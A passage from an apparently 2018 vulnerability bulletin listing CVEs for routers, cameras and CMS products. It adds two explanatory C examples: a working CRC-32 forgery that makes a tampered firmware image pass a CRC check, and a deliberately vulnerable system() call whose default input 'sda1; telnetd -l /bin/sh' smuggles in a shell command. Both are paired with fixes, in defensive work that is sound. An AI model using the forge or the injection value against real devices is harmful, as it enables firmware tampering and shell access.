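Two habits carry the weight here: the input's length is established before any copy, with an upper bound on the scan so an unterminated value cannot run away either, and the destination size is passed to every formatting call with its return value checked. Compiling the firmware with stack protector and non-executable stack would make the overwrite harder to turn into code execution but does not remove the bug.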
    tenda -- multiple_products
        An issue was discovered on Tenda AC7 devices with firmware through V15.03.06.44_CN(AC7), AC9 devices with firmware through V15.03.05.19(6318)_CN(AC9), and AC10 devices with firmware through V15.03.06.23_CN(AC10). A command injection vulnerability allows attackers to execute arbitrary OS commands via a crafted goform/setUsbUnload request. This occurs because the "formsetUsbUnload" function calls a dosystemCmd function with untrusted input.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-14558 | Source: MISC

    typecho -- typecho
        Typecho V1.1 allows remote attackers to send shell commands via base64-encoded serialized data, as demonstrated by SSRF.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18753 | Source: MISC

    vanilla -- vanilla
        Vanilla 2.6.x before 2.6.4 allows remote code execution.
        Published: 2018-11-03 | CVSS: not yet calculated | CVE-2018-18903 | Sources: MISC, MISC

    vecna -- vgo_robot
        When a VGo Robot (versions 3.0.3.52164 and 3.0.3.53662; prior versions may also be affected) is connected to the VGo XAMPP, user accounts may be able to execute commands that are outside the scope of their privileges and within the scope of an admin account. If an attacker has access to VGo XAMPP client credentials, they may be able to execute admin commands on the connected robot.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-17933 | Source: MISC

    vecna -- vgo_robot
        If an attacker has physical access to the VGo Robot (versions 3.0.3.52164 and 3.0.3.53662; prior versions may also be affected), they may be able to alter scripts, which may allow code execution with root privileges.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-17931 | Source: MISC

    vecna -- vgo_robot
        If an attacker has access to the firmware of the VGo Robot (versions 3.0.3.52164 and 3.0.3.53662; prior versions may also be affected), they may be able to extract credentials.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-8858 | Source: MISC

    webiness -- inventory
        Webiness Inventory 2.3 suffers from an arbitrary file upload vulnerability via PHP code in the protected/library/ajax/WsSaveToModel.php logo parameter.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18752 | Source: MISC

    wuzhi -- cms
        An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can change the super administrator's username via index.php?m=member&f=index&v=edit&uid=1.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18712 | Source: MISC

    wuzhi -- cms
        An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can change the super administrator's password via index.php?m=core&f=panel&v=edit_info.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18711 | Source: MISC

    xen -- xen
        An issue was discovered in Xen 4.9.x through 4.11.x, on Intel x86 platforms, allowing x86 HVM and PVH guests to cause a host OS denial of service (NULL pointer dereference) or possibly have unspecified other impact because nested VT-x is not properly restricted.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-18883 | Sources: SECTRACK, MISC

    xheditor -- xheditor
        xhEditor 1.2.2 allows XSS via JavaScript code in the SRC attribute of an IFRAME element within the editor's source-code view.
        Published: 2018-11-03 | CVSS: not yet calculated | CVE-2018-18909 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability. Alternatively, a user could be convinced to display a QR code from the internet to their camera, which could exploit this vulnerability.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-3900 | Source: MISC

    yi -- home_camera_27us
        An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US 1.8.7.0D. An attacker can sniff network traffic to exploit this vulnerability.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-3947 | Source: MISC

    yi -- home_camera_27us
        An exploitable vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a settings change, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-3928 | Source: MISC

    yi -- home_camera_27us
        An exploitable vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3934 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the firmware update functionality of the Yi Home Camera 27US 1.8.7.0D. A specially crafted 7-Zip file can cause a CRC collision, resulting in a firmware update and code execution. An attacker can insert an SD card to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3920 | Source: MISC
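The CVE-2018-3920 entry above hinges on a CRC collision being accepted as proof that a firmware archive is genuine. The program below is an added illustration, not Yi Technology code, and makes no claim about how the camera parses 7-Zip: it implements standard CRC-32 (the checksum zip and 7z archives carry) and the classic four-byte forge that gives any payload any chosen CRC, then shows a constructed tampered image colliding with the original image's CRC.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Added illustration, not Yi Technology code. CRC-32 with the reflected
 * polynomial 0xEDB88320, plus the well-known 4-byte "forge": for any data,
 * compute a suffix whose CRC equals a chosen target. A CRC is a linear
 * error-detecting code, not a MAC, so this is cheap and deterministic.
 */

static uint32_t crc_table[256];
static uint8_t  rev_top[256];      /* top byte of a table entry -> its index */
static int      tables_ready;

static void init_tables(void)
{
    if (tables_ready) return;
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ 0xEDB88320u : c >> 1;
        crc_table[i] = c;
    }
    /* The top bytes of the 256 entries form a permutation of 0..255; that
     * is what lets the forge invert one step of the update below. */
    for (int i = 0; i < 256; i++)
        rev_top[crc_table[i] >> 24] = (uint8_t)i;
    tables_ready = 1;
}

/* Register update without the initial/final XOR, so steps can be chained. */
static uint32_t crc_update(uint32_t s, const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        s = (s >> 8) ^ crc_table[(s ^ p[i]) & 0xFF];
    return s;
}

uint32_t crc32(const uint8_t *p, size_t n)
{
    init_tables();
    return crc_update(0xFFFFFFFFu, p, n) ^ 0xFFFFFFFFu;
}

/* Fill patch[4] so that crc32(data || patch) == target. Working backwards
 * from the wanted register value, each step's table index is fixed by the
 * top byte of the state; a forward pass then turns those indices into the
 * bytes that produce them from the real register state after 'data'. */
void crc32_forge(const uint8_t *data, size_t n, uint32_t target, uint8_t patch[4])
{
    init_tables();
    uint32_t s = crc_update(0xFFFFFFFFu, data, n);
    uint32_t t = target ^ 0xFFFFFFFFu;         /* register value wanted at the end */
    uint8_t idx[4];
    for (int k = 3; k >= 0; k--) {
        idx[k] = rev_top[t >> 24];
        t = (t ^ crc_table[idx[k]]) << 8;
    }
    for (int k = 0; k < 4; k++) {
        patch[k] = (uint8_t)(idx[k] ^ (s & 0xFF));
        s = (s >> 8) ^ crc_table[idx[k]];
    }
}

/* Forge an arbitrary target onto a fixed payload; returns the resulting CRC. */
uint32_t forge_to(uint32_t target)
{
    uint8_t buf[8] = "evil";
    crc32_forge(buf, 4, target, buf + 4);
    return crc32(buf, 8);
}

/* Constructed scenario: the vendor image is replaced by a tampered one and
 * four forged bytes make its CRC match, so a CRC-only check accepts it.
 * Returns 1 if the tampered image collides with the original. */
int forge_demo(void)
{
    static const uint8_t orig[] = "ORIGINAL FW v1.8.7";
    uint8_t tampered[64] = "TAMPERED FW v1.8.7";
    size_t n = strlen((const char *)tampered);
    uint32_t target = crc32(orig, sizeof orig - 1);
    crc32_forge(tampered, n, target, tampered + n);
    return crc32(tampered, n + 4) == target;
}

int main(void)
{
    printf("crc32(\"123456789\") = %08x (check value cbf43926)\n",
           crc32((const uint8_t *)"123456789", 9));
    printf("tampered image matches original CRC: %d\n", forge_demo());
    return 0;
}
```

The fix on the device side is not a stronger checksum but a signature: verify an RSA or Ed25519 signature over the image (or a hash of it) against a public key baked into the firmware before unpacking, and only then trust the archive's own CRCs for corruption detection.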
    yi -- home_camera_27us
        An exploitable vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3935 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-3910 | Source: MISC
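The Tenda usbName (CVE-2018-18728) and goform/setUsbUnload (CVE-2018-14558) entries and the Yi cloud OTA SSID entry above are all command injection: attacker text is spliced into a command line that a shell parses. The C below is an added example, not Tenda or Yi Technology code; the handler names, the mount path and the 31-character device-name limit are assumptions. It shows the vulnerable system() pattern next to allow-list validation and a fork/execvp path that never involves a shell.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (constructed): attacker text is spliced into a shell
 * command line. With dev = "sda1; telnetd -l /bin/sh" the shell runs both
 * commands as the httpd user (root on most routers). Kept for contrast
 * only; never call it with untrusted input. */
int unmount_usb_unsafe(const char *dev)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "umount /mnt/%s", dev);
    return system(cmd);
}

/* Allow-list validation: a device name is 1..31 characters of
 * [A-Za-z0-9_-]. That excludes every shell metacharacter and '/', so
 * "../" path tricks are refused along with "; reboot". Returns 1 if ok. */
int valid_device_name(const char *dev)
{
    size_t n = strlen(dev);
    if (n == 0 || n > 31)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)dev[i];
        if (!(isalnum(c) || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Build the argv for the unmount with no shell involved. path must hold
 * "/mnt/" + 31 + NUL = 37 bytes. Returns 0 on success, -1 if rejected. */
int build_umount_argv(const char *dev, char *path, size_t pathlen, char *argv[3])
{
    if (!valid_device_name(dev))
        return -1;
    int w = snprintf(path, pathlen, "/mnt/%s", dev);
    if (w < 0 || (size_t)w >= pathlen)
        return -1;
    argv[0] = (char *)"umount";
    argv[1] = path;
    argv[2] = NULL;
    return 0;
}

/* Run argv with fork/execvp. Each argument reaches the program as its own
 * string and is never parsed by a shell. This is also the right shape for
 * values such as SSIDs, which legitimately contain spaces and punctuation
 * and cannot be allow-listed as tightly. Returns the exit status or -1. */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                          /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed check used by main() and the tests: 1 if a benign name
 * builds the expected argv and hostile or oversized input is refused. */
int demo_argv(void)
{
    char path[40];
    char *cmd[3];
    if (build_umount_argv("sda1", path, sizeof path, cmd) != 0) return 0;
    if (strcmp(cmd[0], "umount") != 0 || strcmp(cmd[1], "/mnt/sda1") != 0 || cmd[2] != NULL) return 0;
    if (build_umount_argv("sda1|id", path, sizeof path, cmd) != -1) return 0;
    if (build_umount_argv("sda1", path, 4, cmd) != -1) return 0;       /* path too small */
    return 1;
}

int main(int argc, char **argv)
{
    const char *dev = argc > 1 ? argv[1] : "sda1; telnetd -l /bin/sh";
    char path[40], *cmd[3];
    if (build_umount_argv(dev, path, sizeof path, cmd) != 0) {
        printf("rejected device name: %s\n", dev);
        return 1;
    }
    printf("would run: %s %s\n", cmd[0], cmd[1]);   /* the real handler calls run_argv(cmd) */
    return demo_argv() ? 0 : 1;
}
```

For the SSID case the allow-list cannot be this strict, since SSIDs may contain almost any byte; the fix there is the second half of the example only: pass the SSID as one argv element to the tool that needs it (or write it to a configuration file with proper quoting) and never build a shell string from it.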
    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3890 | Source: MISC

    yi -- home_camera_27us
        An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3891 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3892 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the ssid_dst field.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3898 | Source: MISC

    yi -- home_camera_27us
        An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the password_dst field.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-3899 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in admin/banner/editbanner?id=20 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18725 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in admin/link/editlink?id=5 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18721 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in admin/content/editcontent?id=29&gopage=1 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18722 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in index.php/admin/area/editarea/id/110000 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18723 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in index.php/admin/category/editcategory?id=73 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18724 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in admin/sitelink/editsitelink?id=16 in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18726 | Source: MISC

    yunucms -- yunucms
        An XSS issue was discovered in index.php/admin/system/basic in YUNUCMS 1.1.5.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18720 | Source: MISC

    z-blogphp -- z-blogphp
        CSRF exists in zb_users/plugin/AppCentre/theme.js.php in Z-BlogPHP 1.5.2.1935 (Zero), which allows remote attackers to execute arbitrary PHP code.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-18842 | Sources: MISC, MISC

    zte -- zxr10_8905e
        All versions up to V3.03.10.B23P2 of the ZTE ZXR10 8905E product are affected by a TCP Initial Sequence Number (ISN) reuse vulnerability: the device generates easily predictable ISNs, which allows remote attackers to spoof connections.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-7356 | Source: CONFIRM

    zyxel -- vmg3312-b10b_devices
        ZyXEL VMG3312-B10B 1.00(AAPP.7) devices have a backdoor root account with the tTn3+Z@!Sr0O+ password hash in the etc/default.cfg file.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18754 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in zs/search.php via a pxzs cookie.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18791 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in zt/top.php via a Host HTTP header to zt/news.php.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18789 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in admin/classmanage.php via the tablename parameter. (This requires an admin user login.)
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18788 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in zs/zs.php via a pxzs cookie.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18787 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in zs/subzs.php via a zzcmscpid cookie sent to zs/search.php.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18785 | Source: MISC

    zzcms -- zzcms
        An issue was discovered in zzcms 8.3. SQL injection exists in admin/tagmanage.php via the tabletag parameter. (This requires an admin user login.)
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18784 | Source: MISC
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in ajax/zs.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18786
    MISC
    zzcms -- zzcms
     
    An issue was discovered in zzcms 8.3. SQL Injection exists in admin/special_add.php via a zxbigclassid cookie. (This needs an admin user login.)2018-10-29not yet calculatedCVE-2018-18790
    MISC
    zzcms -- zzcms
     
    An issue was discovered in zzcms 8.3. SQL Injection exists in zs/zs_list.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18792
    MISC